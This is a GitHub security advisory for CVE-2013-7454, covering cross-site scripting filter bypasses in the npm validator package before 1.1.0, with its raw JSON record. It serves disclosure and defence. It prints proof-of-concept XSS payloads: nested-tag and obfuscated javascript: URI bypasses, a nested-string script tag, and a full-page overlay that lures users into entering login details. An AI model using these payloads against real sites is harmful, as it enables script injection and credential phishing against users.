ghsa-q4qq-fm7q-cwp5
Vulnerability from github
Published
2017-10-24 18:33
Modified
2021-09-16 19:30
Severity ?
6.1 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Summary
Multiple XSS Filter Bypasses in validator
Details

Versions of validator prior to 1.1.0 are affected by several cross-site scripting vulnerabilities due to bypasses discovered in the blacklist-based filter.

Proof of Concept

Various inputs that could bypass the filter were discovered:

Improper parsing of nested tags:

<s <onmouseover="alert(1)"> <;s onmouseover="alert(1)">This is a test</s>

Incomplete filtering of javascript: URIs:

<a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a>

UI Redressing:

```

You have won

Please click the link and enter your login details: http://good.com

```

Bypass via Nested Forbidden Strings:

<scrRedirecRedirect 302t 302ipt type="text/javascript">prompt(1);</scrRedirecRedirect 302t 302ipt>

Additional bypasses were discovered by Krzysztof Kotowicz in 2012 when auditing CodeIgniter's XSS filtering function, which this code was based off of.

Recommendation

If you are a developer currently using the xss filter function from the validator package, you should consider replacing it with the escape filter function from the same package. This function replaces all instances of angle brackets (<, >), ampersands, and quotation marks, so no HTML tags will be processed.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "validator"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2013-7454"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:50:57Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "Versions of `validator` prior to 1.1.0 are affected by several cross-site scripting vulnerabilities due to bypasses discovered in the blacklist-based filter.\n\n\n## Proof of Concept\nVarious inputs that could bypass the filter were discovered:\n\nImproper parsing of nested tags:\n\n```\n\u003cs \u003conmouseover=\"alert(1)\"\u003e \u003c;s onmouseover=\"alert(1)\"\u003eThis is a test\u003c/s\u003e\n```\n\nIncomplete filtering of javascript: URIs:\n\n```\n\u003ca href=\"javascriptJ a V a S c R iPt::alert(1)\" \"\u003cs\u003e\"\u003etest\u003c/a\u003e\n```\n\nUI Redressing:\n\n```\n\u003cdiv style=\"z-index: 9999999; background-color: green; width: 100%; height: 100%\"\u003e\n\u003ch1\u003eYou have won\u003c/h1\u003ePlease click the link and enter your login details:\n\u003ca href=\"http://example.com/\"\u003ehttp://good.com\u003c/a\u003e\n\u003c/div\u003e\n```\n\nBypass via Nested Forbidden Strings:\n\n```\n\u003cscrRedirecRedirect 302t 302ipt type=\"text/javascript\"\u003eprompt(1);\u003c/scrRedirecRedirect 302t 302ipt\u003e\n```\n\nAdditional bypasses were discovered by Krzysztof Kotowicz in 2012 when auditing CodeIgniter\u0027s XSS filtering function, which this code was based off of.\n\n\n## Recommendation\n\nIf you are a developer currently using the xss filter function from the validator package, you should consider replacing it with the escape filter function from the same package. This function replaces all instances of angle brackets (\u003c, \u003e), ampersands, and quotation marks, so no HTML tags will be processed.",
  "id": "GHSA-q4qq-fm7q-cwp5",
  "modified": "2021-09-16T19:30:36Z",
  "published": "2017-10-24T18:33:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-7454"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-q4qq-fm7q-cwp5"
    },
    {
      "type": "WEB",
      "url": "https://nealpoole.com/blog/2013/07/xss-filter-bypass-in-validator-nodejs-module"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/41"
    },
    {
      "type": "WEB",
      "url": "http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Multiple XSS Filter Bypasses in validator"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.